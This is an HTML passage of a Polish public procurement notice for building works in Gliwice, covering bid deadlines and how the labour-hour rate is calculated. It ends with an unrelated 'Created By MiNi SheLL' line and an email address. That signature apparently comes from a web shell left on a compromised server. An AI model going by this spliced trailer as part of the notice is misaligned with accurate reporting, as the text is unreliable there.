<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.01.2014 godzina 09:00, miejsce: Zarząd Budynków Miejskich I TBS Sp. z o.o. Sekcja Zamówień Publicznych, Dolnych Wałów 11, Ip., pok. 111, 44-100 Gliwice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z numeracją SIWZ:
OPIS SPOSOBU OBLICZENIA CENY:
13.1	Wykonawca przedstawi w ofercie wartości składników cenotwórczych, według których nastąpi rozliczenie kosztorysowe wykonanych robót:
Roboczogodzina (R)
Koszty ogólne (Ko) do R i S
Zysk (Z) do R i S i Ko
Materiał (M) [na podstawie cen zakupu materiałów lecz nie wyższych niż średnia wartość SEKOCENBUD]
Sprzęt (S) [nie wyższy niż wartość średnia z kolumny 5 informacji o stawkach robocizny kosztorysowej oraz o cenach pracy sprzętu budowlanego opublikowanego przez SEKOCENBUD].
13.2	Kosztorysy należy wykonać w oparciu o Rozporządzenie M.R.R. i B. z dnia 13 lipca 2001r. (Dz.U. Nr 80, poz. 867) w sprawie metod kosztorysowania obiektów i robót budowlanych, w oparciu o metodę kalkulacji szczegółowej, stawiając jako bazę normatywną katalogi KNR i KSNR. W przypadku robót nie ujętych w ww. katalogach należy stosować kalkulację indywidualną.
13.3	W celu wyboru najkorzystniejszej oferty, Wykonawca poda w ofercie rzeczywistą wartość roboczogodziny (netto), obliczoną z zależności:
Rrzecz = R [1+(Ko/100)] [1+(Z/100)].
13.4	Rzeczywista wartość roboczogodziny podlegać będzie ocenie przez Komisję Przetargową, zgodnie z kryterium ceny.

Numer referencyjny sprawy: 175/PZ/2013/ZBM.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com